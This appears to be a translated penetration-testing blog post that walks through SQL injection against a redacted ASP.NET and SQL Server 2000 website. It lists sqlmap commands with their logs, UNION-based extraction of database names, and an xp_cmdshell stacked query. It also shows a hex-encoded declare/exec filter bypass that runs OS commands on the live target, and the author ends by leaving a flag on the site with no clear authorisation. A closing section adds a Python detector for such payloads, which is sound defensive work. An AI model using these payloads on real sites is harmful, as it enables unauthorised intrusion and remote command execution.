A teenager asked me to test a site that has an error-based injection point: the database name can be read, but sqlmap's --os-shell option inexplicably fails.
After several rounds of testing I found that xp_cmdshell is enabled, yet sqlmap still cannot execute commands through it. Why?
Having just read "SQL Injection Attacks and Defense", this felt like a really good target to practice on!
To keep the steps simple, the write-up is split into 5 test records;
0x1 Sqlmap common statement tests
Test 1 purpose: execute a cmd command
Test 1 result: the initial test could not connect;
-----------------------------------------------------
C:\users\administrator>sqlmap -u "http://www.****.com/index/searchresult.aspx?keyname=1&keyword=1" --level 5 --risk 3 --technique BST --batch --os-shell
(from the log file)
---
Parameter: keyword (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyname=1&keyword=1%' and 1799=1799 and '%'='
---
[00:26:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[00:26:38] [CRITICAL] unable to prompt for an interactive operating system shell via the back-end DBMS because stacked queries SQL injection is not supported
Test 2 purpose: get the database names;
Test 2 result: retrieved successfully; from this I judge that some keyword is being filtered.
-----------------------------------------------------
C:\users\administrator>sqlmap -u "http://www.****.com/index/searchresult.aspx?keyname=1&keyword=1" --level 5 --risk 3 --technique BST --batch --dbs
(from the log file)
---
Parameter: keyword (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyname=1&keyword=1%' and 1799=1799 and '%'='
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
available databases [7]:
[*] master
[*] model
[*] msdb
[*] northwind
[*] pubs
[*] tempdb
[*] W**er
0x2 Manual testing of keyword filtering
Test 3 purpose: get the database name
Test 3 result: executed successfully;
-----------------------------------------------------
http://www.****.com/index/searchresult.aspx?keyname=1&keyword=1%' UNION ALL SELECT 1,db_name(5),3,4,5 FROM master..sysdatabases--
Test 4 purpose: following the WooYun Drops article, try entering a SQL statement manually that uses xp_cmdshell to execute commands
Test 4 result: unable to connect to the server; a 404 page is returned;
-----------------------------------------------------
; EXEC master..xp_cmdshell 'net user'--
Test 5 purpose: add the % symbol to the keyword and output the keyword, to determine which keyword is filtered;
Test 5 result: xp_cmdshell and sp_configure are not filtered. However, a SQL statement error occurs as soon as the payload contains a single quote ('): the quote is parsed as part of the normal statement.
-----------------------------------------------------
http://www.****.com/index/searchresult.aspx?keyname=1&keyword=1%' UNION ALL SELECT 1,'Xp_shell',3,4,5--
The error reported by the target:
Server Error in '/' Application.
There is a syntax error near the keyword 'and'.
Description: An unhandled exception occurred during the execution of the current web request. Check the stack trace for more information about the error and where it originated in the code.
Exception Details: System.Exception: There is a syntax error near the keyword 'and'.
Workaround: try a hex bypass using declare;
Local testing:
-------------------
declare @a sysname select @a= exec master.dbo.xp_cmdshell @a
Local test statement, where 0x770068006f0061006d006900 is the hex (UTF-16LE, since @a is sysname) encoding of "whoami":
SELECT TOP 2 [id],[name] FROM [personnel].[dbo].[Management];declare @a sysname select @a=0x770068006f0061006d006900 exec master.dbo.xp_cmdshell @a;
Local test results: see tu1.jpg
Test result: the target does not echo output, but a command that writes to a file succeeds.
http://www.****.com/index/searchresult.aspx?keyname=1&keyword=1%';declare @a sysname select @a=0x770068006f0061006d006900 exec master.dbo.xp_cmdshell @a;--
Leave a flag;
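The point of the workaround above is that the command string never appears in clear text, so a keyword or quote filter on the search page never sees it. As an added example (my code, not from the original post), the following log-review helper URL-decodes a request, expands T-SQL 0x... literals (UTF-16LE for the sysname/nvarchar case used here, single-byte otherwise) and only then matches tokens; the sample query strings are constructed from the shape of the post's URLs and the token list is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Tokens worth alerting on in this search page's query string (assumed list).
SUSPECT = ("xp_cmdshell", "sp_configure", "declare", "exec", "whoami")

# A T-SQL binary literal: 0x followed by whole byte pairs.
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)")


def decode_hex_literal(hexdigits: str) -> str:
    """Decode one 0x... literal to text.

    'declare @a sysname' makes @a an nvarchar (UTF-16LE) value, so the post's
    0x770068006f0061006d006900 is b'w\\0h\\0o\\0a\\0m\\0i\\0'. A varchar literal has
    no interleaved zero bytes, so decode that one as single-byte text.
    """
    raw = bytes.fromhex(hexdigits)
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def normalise(query_string: str) -> str:
    """URL-decode, expand every hex literal into a quoted string, lowercase."""
    decoded = unquote_plus(query_string)
    expanded = HEX_LITERAL.sub(
        lambda m: "'" + decode_hex_literal(m.group(1)) + "'", decoded)
    return expanded.lower()


def suspicious_tokens(query_string: str) -> list:
    """Return the SUSPECT tokens present once the request is normalised."""
    text = normalise(query_string)
    return [t for t in SUSPECT if t in text]


# Constructed sample requests (query strings only, host omitted).
SAMPLES = {
    "benign": "keyname=1&keyword=printer",
    "hex_nvarchar": "keyname=1&keyword=1%';declare @a sysname select @a=0x770068006f0061006d006900 exec master.dbo.xp_cmdshell @a;--",
    "hex_varchar": "keyname=1&keyword=1%';exec master.dbo.xp_cmdshell 0x77686f616d69;--",
}

if __name__ == "__main__":
    for name, qs in SAMPLES.items():
        print(f"{name}: {suspicious_tokens(qs)}")
```

Matching on the raw URL would only ever catch "declare" and "xp_cmdshell" here; the decoded "whoami" is what tells an analyst which command was run.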
SQL Server injection: executing SQL statements via dynamic queries